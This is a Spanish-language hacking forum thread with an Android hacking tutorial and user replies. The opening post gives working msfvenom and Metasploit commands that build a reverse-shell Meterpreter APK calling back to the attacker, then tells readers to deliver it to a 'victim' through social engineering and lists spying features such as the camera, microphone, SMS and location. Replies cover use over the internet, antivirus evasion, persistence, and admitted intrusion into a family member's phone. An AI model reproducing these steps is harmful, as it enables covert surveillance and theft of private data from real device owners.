comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Como tomar control de un dispositivo Android en menos de 1 minuto

  • 17 Respuestas
  • 12429 Vistas

chapaletina y 8 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5411
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Mayo 24, 2017, 11:27:24 pm »
Como es de público conocimiento el sistema operativo Android cubre aproximadamente el 85% del mercado, superando a Apple y Windows Phone. Por eso es tan importante mostrar algunos de los ataques que se pueden realizar para tomar conciencia de la seguridad de los dispositivos y de la información que un usuario expone en sus dispositivos.


Antes que nada, muy buenos días, hoy vamos a tratar un tema muy recurrente de la cual mucha gente cree esta exenta, el ataque a dispositivos Android, voy a tratar de demostrar como con un par de simples líneas de comandos y un poco de ingeniería socia como podemos acceder a un dispositivo Android, recuerden siempre trabajar en un entorno de LABORATORIO

NECESITAMOS:

    1 Máquina Virtual con KALI 2.0 o Backtrack (vamos a usar Metasploit)
    1 Máquina Virtual con Android

EMPECEMOS:

La creación de la máquina virtual con KALI esta explicada en el POST anterior asique eso queda descartado, ahora nos vamos a enfocar en la creación de la máquina virtual con ANDROID que particularmente para mí fue bastante difícil encontrar algo que se parezca lo bastante posible a un dispositivo Android, que además sea fácil y que sea rápido ya que por lo general la virtualización de este tipo de dispositivos consume bastaste recursos.

En este caso voy a utilizar Genymotion es un emulador de Android que aprovecha la arquitectura x86 para ejecutar de forma fluida y rápida distintos dispositivos Android. Olvidando la lentitud del emulador nativo de Android podemos ejecutar todo tipo de aplicaciones y juegos en nuestro Windows, Mac o Linux. Uno de los principales usos de Genymotion es facilitar el desarrollo de aplicaciones Android. Casi más de 900.000 usuarios registrados usan sus máquinas virtuales para crear aplicaciones usando Eclipse o intelliJ. Se integran perfectamente con el adb, línea de comandos y los diferentes entornos de desarrollo. Podemos lanzar en apenas un par de segundos las aplicaciones conectadas al ADT desde el IDE para testearla. Mucho tiempo ahorrado. Genymotion está basado en el uso de máquinas virtuales x86 optimizadas para correr sobre Virtual box. A muchos les sonarán proyectos similares, pero la gente de Genymotion ha conseguido crear una interfaz simple capaz de soportar distintas funcionalidades accesibles a cualquier usuario, sin olvidar a los desarrolladores (su principal target y modelo de negocio).

Acá les dejo el link de donde descargarlo: https://www.genymotion.com/#!/download (aclaración, primero deben crearse un usuario, ya que es requerido para descargar el dispositivo luego).

Una vez descargado Genymotion pueden descargar por versión de Android (actualmente tiene desde la versión 2.3.7 hasta la 5.1.0) o por Dispositivo en donde podrán elegir marcas entre SONY, SAMSUNG, HTC, MOTOROLA, GOOGLE entre otras, cada una de la versiones con distintos requisitos.


Una vez que terminamos de descargar la versión de dispositivo que necesitamos nos queda más o menos así: (en mi caso descargue el modelo Nexus 5 con Android 4.4.4)


Solo les queda hacer click en “Start” para prender la máquina virtual y que se nos vea de la siguiente forma:


Listo! Ya tengo mi Nexus 5 andando y listo para hacer las pruebas que necesite!

Ahora si vamos al KALI a preparar la aplicación maliciosa (Application Package File o “.APK” )

Creamos el archivo malicioso, para eso usamos MSFVENOM desde una terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI LPORT=Puerto_KALI R > /root/AplicacionMaliciosa.apk


Listo, ya tengo mi APK maliciosa:


Lo próximo es dejar “escuchando” desde KALI hasta que la víctima ejecute la aplicación, para eso abrimos METASPLOIT y lo configuramos de la siguiente manera:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IP_KALI
set LPORT Puerto_KALI
exploit



Ahora debemos enviar el APK malicioso a nuestra victima usan un poco de Ingeniería Social
y nos queda esperar a que la víctima lo ejecute luego de eso obtendremos lo siguiente:


Android Hackeado!!


Listo!!! Una sesión de Meterpreter conectada hacia nuestra víctima, en este caso se puede ver que el comando “sysinfo” me dice que la víctima tiene un Android 4.4.4

Con el comando HELP podemos ver qué acciones podemos hacer en el dispositivo, muchas de las acciones ya fueron explicadas en POST anteriores, pero las acciones particulares de Android son:

    Grabar con el Micrófono
    Tomar Fotos con ambas cámaras (Frontal y Trasera)
    Hacer Streming desde la cámara seleccionada
    Verificar si el dispositivo es ROOTEADO
    Obtener el listado de llamadas
    Obtener el listado de Contactos
    Obtener los SMS
    Obtener la Ubicación del Dispositivo
    Enviar SMS
    Entre otras más cosas…


¡! ACLARACIÓN !¡: El dispositivo tiene que PERMITIR el uso de aplicaciones de Origen Desconocido.


Autor: Matias


Desconectado jozetroub

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación -2
    • Ver Perfil
« Respuesta #1 en: Mayo 24, 2017, 11:38:01 pm »
el dispositivo, al que realizaremos el ataque, tiene que ser root?

Desconectado marcuscrassus

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 24, 2017, 11:39:14 pm »
Se pasaron maestros

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5411
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Mayo 24, 2017, 11:42:01 pm »
el dispositivo, al que realizaremos el ataque, tiene que ser root?

No necesariamente.

Saludos,
ANTRAX


Desconectado marcuscrassus

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Mayo 24, 2017, 11:42:07 pm »
el dispositivo, al que realizaremos el ataque, tiene que ser root?
No creo que sea necesario, ciertas funciones si requieren de root, habria que montar todo en el laboratorio para despehar dudas y comentar nuestras experiencias

Desconectado DUDA

  • *
  • Underc0der
  • Mensajes: 331
  • Actividad:
    0%
  • Reputación 1
  • Hago pocas cosas, pero las hago bien.
    • Ver Perfil
« Respuesta #5 en: Mayo 25, 2017, 12:32:33 pm »
Cita de: ANTRAX
¡! ACLARACIÓN !¡: El dispositivo tiene que PERMITIR el uso de aplicaciones de Origen Desconocido.

Sabemos que de manera nativa un usuario tiene esta opción deshabilitada, ¿alguien sabe alguna forma de primero lograr permitir esta opción?

Gracias por leer!
DUDA
« Última modificación: Mayo 25, 2017, 07:05:47 pm por DUDA »

Desconectado Blest777

  • *
  • Underc0der
  • Mensajes: 63
  • Actividad:
    0%
  • Reputación 0
  • Todo es vanidad.
    • Ver Perfil
« Respuesta #6 en: Mayo 25, 2017, 12:32:53 pm »
Antrax, muy bueno el post. Probé esto tiempo atrás y no resultó como esperaba. Hubieron algunos errores, entre ellos estaba, que no funcionó con mi celular Alcatel Pixie Android 6.0.1 (no está rooteado). Después hice el mismo procedimiento con mi celular el LG G2 Android 5.0.1 (rooteado) y funcionó perfectamente.

También me pude percatar que es detectable el APK infectado al antivirus que tenga el celular y hasta con la aplicación "Clean Master" me detecto el APK como archivo malicioso.
... De las piedras y el aire no proviene el concepto de lo que es bueno y lo que es malo, de la no vida no puede surgir vida.

Desconectado Victor_AlonsoCM

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Mayo 25, 2017, 12:34:19 pm »
Este método solo funciona en una red local o también puede funcionar en otras redes?

Desconectado mfuck

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Ultimate Software Now
    • Email
« Respuesta #8 en: Mayo 25, 2017, 02:33:59 pm »
Este método solo funciona en una red local o también puede funcionar en otras redes?

Sí funciona en Otras. En vez de asignar una IP como atacante, asignas tu dirección no-ip o dyndns... etc.
Debes mapear tus puertos en el router del isp para poder acceder desde la WAN cuando estás Nateando. :D

Lo malo de este método es que las sesiones no perduran en versiones de android 5.0.1 hacia arriba y sin root.
Lo probé el año pasado con un amigo desde una red 3G a 1000km de distancia... y no tenía root, al menos podía enviar sms desde su numero a sus contactos XD
« Última modificación: Mayo 25, 2017, 02:35:50 pm por mfuck »

Desconectado Slenderhack

  • *
  • Underc0der
  • Mensajes: 112
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Mayo 26, 2017, 02:59:35 pm »
Muy buen aporte :) ! , mi duda es en la prueba como le paso el apk a el emulador ?

Desconectado Dorito

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #10 en: Mayo 29, 2017, 09:44:41 pm »
Hola... Muy buen post y mas para los que estamos aprendiendo.

Tengo un inconveniente al poner exploit en la metasploit

 Handler failed to bind to 192.168.0.100:8080:-  -
  • Started reverse TCP handler on 0.0.0.0:8080
  • Starting the payload handler...


En que estoy fallas, Gracias si me pueden ayudar

Desconectado RuidosoBSD

  • *
  • Underc0der
  • Mensajes: 183
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Email
« Respuesta #11 en: Junio 04, 2017, 06:18:22 pm »
Muy buena PoC, desde luego.
Aunque no sea necesario hacer root (no lo creo) si que el dispositivo tiene que tener habilitada la opcion de instalar software de fuentes no oficiales.

Desconectado Nhevheq

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #12 en: Junio 10, 2017, 07:37:46 pm »
Como hago para descargar imagenes del celular a kali? Se que es el comando download pero como pongo la ruta?

Desconectado d3mVs

  • *
  • Underc0der
  • Mensajes: 19
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Junio 11, 2017, 08:01:32 am »
Hola... Muy buen post y mas para los que estamos aprendiendo.

Tengo un inconveniente al poner exploit en la metasploit

 Handler failed to bind to 192.168.0.100:8080:-  -
  • Started reverse TCP handler on 0.0.0.0:8080
  • Starting the payload handler...


En que estoy fallas, Gracias si me pueden ayudar

No se puede bindear a esa IP, seguramente no es la IP de la máquina. Compruebalo
Código: [Seleccionar]
~#ip addr.

Desconectado KFZ_10

  • *
  • Underc0der
  • Mensajes: 55
  • Actividad:
    0%
  • Reputación 0
  • ¿Aprender es mi vida?
    • Ver Perfil
« Respuesta #14 en: Junio 18, 2017, 01:47:17 am »
Muchas gracias por el aporte. Gracias a este tipo malware pude hackear el movil de mi familia.

Un saludo. :) :)

Desconectado subl3tt

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #15 en: Junio 19, 2017, 04:20:24 pm »
De esta manera, casi todos los antivirus que vienen de fabrica con los móviles hoy en día te lo detectan. Existen varias aplicaciones como Shellter o como Apkwash que pueden dificultar su trabajo. Además es recomendable firmarlas.

Desconectado Ralmo

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #16 en: Diciembre 02, 2018, 04:52:45 pm »
Gracias por el aporte! Que pasa si se reenicia el celular infectado? se pierde la coneccion ? o la coneccion dura hasta que se desinstale la apk?

Gracias!

Conectado octopus

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
« Respuesta #17 en: Diciembre 10, 2018, 11:48:53 pm »
Si se reinicia se pierde la conectividad a menos que la persona vuelva a iniciar la apk, lo que se puede hacer es que se deje persistente, y como dice el amigo mas arriba ay que tratar de que la detecten lo menos posible.


Enviado desde mi iPhone utilizando Tapatalk

 

¿Te gustó el post? COMPARTILO!



Como usar Google DoSear contra sitios web alojados en grandes dominios

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 2237
Último mensaje Mayo 04, 2012, 12:12:50 am
por Cronos
Como controlar el trafico aereo gracias al hacking de buscadores

Iniciado por Rootkit_Pentester

Respuestas: 7
Vistas: 3226
Último mensaje Abril 22, 2017, 04:38:16 pm
por GotKiller_22
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 3
Vistas: 2560
Último mensaje Octubre 01, 2018, 03:05:53 pm
por Kyxda
El caso de la red Zello o como intervenir comunicaciones en red social

Iniciado por Rootkit_Pentester

Respuestas: 6
Vistas: 1315
Último mensaje Julio 11, 2018, 07:00:30 pm
por Rootkit_Pentester
Mr looquer o tambien conocido como el Shodan de IPV6

Iniciado por Rootkit_Pentester

Respuestas: 1
Vistas: 1956
Último mensaje Enero 13, 2017, 06:17:21 pm
por Bael